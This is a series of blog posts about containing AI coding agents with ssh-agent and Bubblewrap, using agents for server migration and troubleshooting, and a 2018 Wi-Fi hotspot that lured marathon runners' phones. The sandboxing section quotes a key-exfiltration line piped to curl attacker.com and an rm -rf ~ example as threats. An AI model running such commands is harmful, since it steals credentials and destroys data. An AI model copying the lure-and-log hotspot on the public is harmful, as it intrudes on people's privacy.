Giving coding agents ssh access without disclosing secrets

LLM agents with read access to private ssh keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that gathers the public SSH host keys found on the local system. It reduces some friction in ssh if the user has failed to put a key in an ssh connection request. If you have the public key in your $HOME directory, ssh-keyscan will try to find it.

Claude’s hoping I left a key around for the remote host. It will try to add it to the known_hosts file, which will enable it to make a direct connection to the other system if I have password auth disabled.

For extra safety- it won’t accept any scenario where the remote host’s ssh key has changed. This is “Safe” because the events where a system offers a new key should be very limited- regularly being prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. These solutions are incomplete. In this instance, the agent’s trying to connect to a host even though it doesn’t have the key.

It’s making a valiant effort- but it will fail. I ssh-copy’d a key to this system, but I’m running sandboxed Claude and protecting the agent from access to the ssh key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that can never leak. Chat histories get filled with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than giving them a private key. It’s been around for decades. Networking and operations engineers use it all the time- but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring agent never knows your private key. You’ll feel greater confidence when access is revocable with a single command. Even a fully compromised agent can’t steal your private keys.

What is SSH-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted. Programs that need to authenticate
    ask the agent rather than accessing the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around. It’s essentially a secure key wallet that runs in the background for the duration of your login session.

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄──────-│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the agent needs to authenticate, SSH asks the agent process to sign a challenge
  4. The agent process asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345). It then exports the $SSH_AUTH_SOCK environment variable- which points to that socket. Any process that inherits this variable can communicate with the agent. SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel- it is not a credential. Reading the variable only gives you a path — without the ssh-agent process behind it, the socket is useless. This gives your agent the ability to ask for the SSH-AGENT to sign it’s requests without ever having access to the account key.

You may ask: how do I keep rogue processes from requesting signatures from the SSH-AGENT? Unfortunately- If they’re running under your user account, you’re going to have challenges. Everything that runs as you has the same access rights as you. You’ll want to move those potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is you can just kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys

Why This Matters for AI Agents Specifically

Least privilege by design The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive — not a portable credential.

Auditability The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability Kill the ssh-agent process or remove the key with ssh-remove, and the agent instantly loses access. No secret rotation needed.

No secret in the environment Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables.
Those can be read by any process, printed with env, leaked in logs. The SSH_AUTH_SOCK only points to a socket. Reading the path to a socket is generally not a security sensitive action.

The Capabilty-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.

Practical Example

Start the session

eval "$(ssh-agent -s)"
Add a public key that can be exposed to the agent
ssh-add ~/.ssh/id_ed25519 
You'll be prompted to enter your passphrase for the key- and now the ssh-agent will have the ability to sign requests without exposing the private key. 

You can now launch your coding agent — it inherits SSH_AUTH_SOCK.  Your coding agent can now git pull, ssh deploy, etc. When you're done, kill the agent: 

ssh-agent -k # all delegated access revoked instantly 

You can see that killing the agent kills the socket. A coding agent can be invoked and have full SSH access without reading a secret.

Agent frameworks should be built using capability delegation. Don’t give ai agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets. It’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After a posting on LinkedIn, Luke Hinds observed similar ideas behind a recent pull request by Francois Proulux which added UNIX Domain sockets that supports using Secure Enclave backed ssh-agents in Nono.sh. Worth a look!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide- I found a better approach and I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other better approaches. Firejail would likely work well- but also there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like lsps -aux, or less
  • We want to invoke this binary while easily preventing it from accessing sensitive files unrelated to binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the agent’s access to dangerous commands is prevented.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch  ~/.aws, your browser profiles, your ~/Photos library or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this, is –dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in desiging, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld Server and vends web assembly quake clients. It’s an instant-lan party in a box. I did this unattended and it works. –dangerously-skip-permissions is very powerful- assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying with empty files (You need to know exact path of files 

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

ThreatDIY bwrapAnthropic SRT
Claude accidentally rm -rf ~✓ Protected✓ Protected
Claude exfiltrating ~/.ssh✓ Protected✓ Protected
Supply chain attack via npm✓ Not exposed✗ Exposed
Subtle misconfiguration✗ Your risk✓ Their expertise
Agent Telemetry you don’t want sent✓ You control? Their choice
Novel bypass techniques✗ You’re on your own✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked different- we’re not going to call claude- we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your ~/$HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my github.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy 1 liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to backup and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • an objective,
  • 7 phases of migration activities
  • Clear expressions around safety & best practices & defined success conditions.

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 3: Live System Discovery
Phase 4: Analysis & Comparison
Phase 5: Context Documentation & Knowledge Updates
Phase 6: Operations Documentation
Phase 7: Final Deliverable

The general gist of the above is:

Search from a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered & corrected. I do this because it reduces any need for redundant troubleshooting activities by the agents across different sessions. This also helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what’s supposed to be on the target system.

Then the agent looks into a live system to understand what’s actually on the systems (either due to configuration drift or some other change).

When that’s complete, we go munge everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A Reserved ports list
  • A Storage constraint: /home partition at 75% capacity—I had to put new services in /opt/
  • Available resources: 650GB disk space in /opt/, 25GB+ RAM available
  • Active Cloudflare tunnel for my AI endpoint that I had to keep untouched

Validating Backup Procedures

I validated that the deployed backup scripts followed official documentation. I’ve found that the agents sometimes try to invent their own backup strategies. They can work, but they also break future updates. Next I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

PhasePurpose
1. Pre-Migration PreparationVerify prerequisites, create rollback points
2. Data Quality AssessmentGenerate backup, verify integrity, record baseline counts
3. Prepare ai serverCreate directory structure, Docker Compose stack
4. Data Transferrsync backup to target, restore databases and volumes
5. Testing (QA/QC)Local testing, data verification, create Ghost API key
6. Staging DNSAdd temporary *bak DNS names to ai server tunnel
7. Staging ValidationExternal testing, write tests, Go/No-Go checkpoint
8. Reconfigure kbr serverConvert to dev environment with *-dev DNS names
9. DNS CutoverSwitch production names to ai server
10. CleanupRemove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness
  • rsync with progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring kbr system and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.

Conclusion

Migrating self-hosted services between servers doesn’t have to be scary. I used agents to perform discovery through a phased approach that included staged DNS testing, and clear rollback procedures to execute this complex migration.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: compare before and after

Sneaky wifi near weird marathons (Part 1)

In 2018, I ran a Wifi network with a well known public SSID off a raspberry pi and ended up catching lots of marathoner phones. My network was not configured for sniffing- purely attaching. Phones with the right WiFi settings would automatically attach to the WiFi network.

My interest was in exploring whether phones promiscuously attach to WiFi networks they recognize. My network didn’t vend Internet access- which means I couldn’t spy on people’s traffic. But I did vend DHCP to anyone who tried to connect, which enabled me to gather some data about devices that attached.

The hotspot wasn’t operated from my house- I had to do a little work to get the network to the runners. I live in the pacific northwest. Rain is an issue. Back then, I didn’t know enough antenna theory to broadcast long distances, so my setup was janky. If you looked around, you’d see a Tupperware box left behind during some spring cleaning.

After several weeks of iteration, I was ready for the marathon. The race is called “Beat the Blerch.” The name is a tribute to the desire to quit. Running is about ignoring that desire. The organizers have cake stations and couches out on our trail to tempt people into taking a break. Some runners wear inflatable t-rex costumes. Pretty gross!

I turned my hotspot on and started looking at logs. When you monitor the logs of HostAPD, you can see the MAC addresses of the devices that attach. This information can be used to identify the device type that connected. Over the course of the marathon, I saw an interesting diversity of devices attach:

You can see that Apple dominated the running community. It’s interesting to see a Blackberry device in 2018. Someone was in a committed relationship with their phone!

This project worked because carriers have a “WiFi offload” strategy. Unlimited data is relatively new. Carriers were still scrambling to provide transport that met the demand of customers. Phones have been tuned to attach to recognized networks in order to offload traffic during metering. I suspect that some day in the future, data caps will get reintroduced thanks to the popularity of 4k streams on 3 inch displays. Time will tell.

There is another fun property of my data! I can graph the attachment rate of runners passing during the marathon. The slope is steep when we’re at the start of the race. Competitive runners quickly disappear and the slope goes gradual. Our graph is pretty boring till we get to the end of the marathon. Is this because the slowest runners don’t give up?

NO! There’s a 10k happening as well! It happens to turn around at the end of the trestle. The slope in our graph declines because the 10k participants start showing up. Short races are more popular! We see a much more steady rate of attaches as a result. As we move to the right, the marathoners are on their return. The tangent-like shape isn’t because of runner resilience. It’s showing you that the steepest slopes are representing folks doing harder things.

The run spanned two days. The second day was rainy, which significantly dampened participation:

On day 1 I caught about 155 devices, but day 2 only brought us about 40.

This was a fun project- but it was scrappy. When I started off, I didn’t really know how to configure hostAPD or DNSMasq. I had to figure out a bunch of implementation details on the fly. I didn’t document my project. It took several weeks and I was lucky. I had enough saved logs and sed magic to generate a cool looking set of graphs. But compiling the WiFi drivers was a pain. You can see my setup had to be in close proximity to the race. The antenna set was not optimized for outdoor transmission. It was not a reproducible project- and it certainly wasn’t stable.

2025

The annual Blerch marathon ran past my house earlier this month.

Four days before the event, I put a challenge in front of myself: Create a reproducible version of the ‘catcher’ project using my LLM-supported automation

I’m more experienced now and consequently, less interested in proving vulnerabilities. I’d prefer to build enduring solutions. In this case, my goal is rapid delivery of IoT prototypes and projects. Anecdotally, I’ve heard prototyping a first iteration of complex IoT takes between 3-9 months. I would consider developing a project requirements doc, implementing code, implementing unit & integration tests and delivering a working implementation in scope for the first run of a prototype. Keep in mind: there’s considerably more work involved to get from concept to market.

I’ve been building what I guess are my own custom AI “agents” for almost a year. I’ve had some intuition about using different tools for quickly building firmware images that were useful. I’ve recently started experimenting with creating agents that actually deploy and troubleshoot deployments. It’s been working so well that it’s starting to feel weird. Building complex hardware systems quickly shouldn’t be this fast. I suspect I can turn a device around in a single day.

My “Win conditions” are more about creating a reproducible project than proving vulns. I want to prove that I can quickly turn around a complex project prototype. “Complex” in this case means we include peripherals and inter-component integration. This boils down to 3 goals

  1. Demonstrate the implementation of an external wifi adapter for vending the wifi network. This would require autonomous troubleshooting and configuration tasks related to wifi configuration. There are complex design and implementation decisions that come with activating AP Mode. An AI Agent can speed run that process. It would also demonstrate an Agent’s ability to troubleshoot driver compilation errors.
  2. Implement a paperwhite display that could present status of the pi. This would include status of the wifi network and any attached devices. Most IoT has some kind of interface that people will interact with. I wanted to demonstrate that a peripheral-based UI can be implemented with agents.
  3. Implement the whole project via custom deployment & troubleshooting agents. When I did this last time, I was in my office on weekends and evenings at the expense of spending time with my kids. I wanted to wield my AI towards productivity gains.

How did it work out? Hit refresh for about a week and I’ll include a link to Part 2!

Agent Driven Software Troubleshooting

Welp- I experienced an unanticipated error in nodogsplash on a build:
This is an ansible-playbook installation task screenshot showing the compilation error.

So I sent my agent after it. I fed a claude session with a troubleshooting prompt and directed it to review the source code in the directory and gave it permission to ssh into a the recipient image that was failing:

Cool to see my “AgentLessonsLearned” concept being explored. See this to get context on AgentLessonsLearned.

and then the agent made progress on identifying the root cause:

The agent tries to make a fix:

And now I validated that the fix works!

I resumed the build and the issue was fixed!


What does this mean?

  • I don’t have to parse difficult to read error messages to figure out the source of the problem.
  • I don’t have to do google searches to troubleshoot exotic errors.
  • I get a document that tells me what problems were experienced, how they were diagnosed and how they were fixed. I get the lessons learned without the work.
  • I feel like I’m a little further up on the productivity asymptote.
  • Protoypes that used to take me over a month are done in a couple days.

Is this cool to you? Connect with me on twitter (@patrickmccanna) with a project proposal for a raspberry pi. Feel free to add hardware like the pi sense hat or the Inky hat. Let’s see how quickly I can turn user requirements into a working prototype!

A little update on Agent-driven software development.

Today I’m testing a new version of my independent software deployment agent. It uses ansible orchestration to push software onto recipient systems so I can prototype with different software stacks.

The major change is that I’ve delivered objectives that are structured and independent of the playbook creation process.

One innovation I’m playing with is creating a .AgentLessonsLearned directory in any directory where a file produces an error.

Agent Lessons Learned

We lose memory when we start new sessions. What if agents left notes for future agents so that the future agent has the wisdom obtained by past agents?

I’ve crafted a prompt that tells the agent to search for lessons learned files when they’re going to do some troubleshooting. If they don’t exist, it creates one for the bug it’s troubleshooting after it has implemented & validated a fix.

I’ll report back to share how this works over time- but for now I’m very excited about this concept.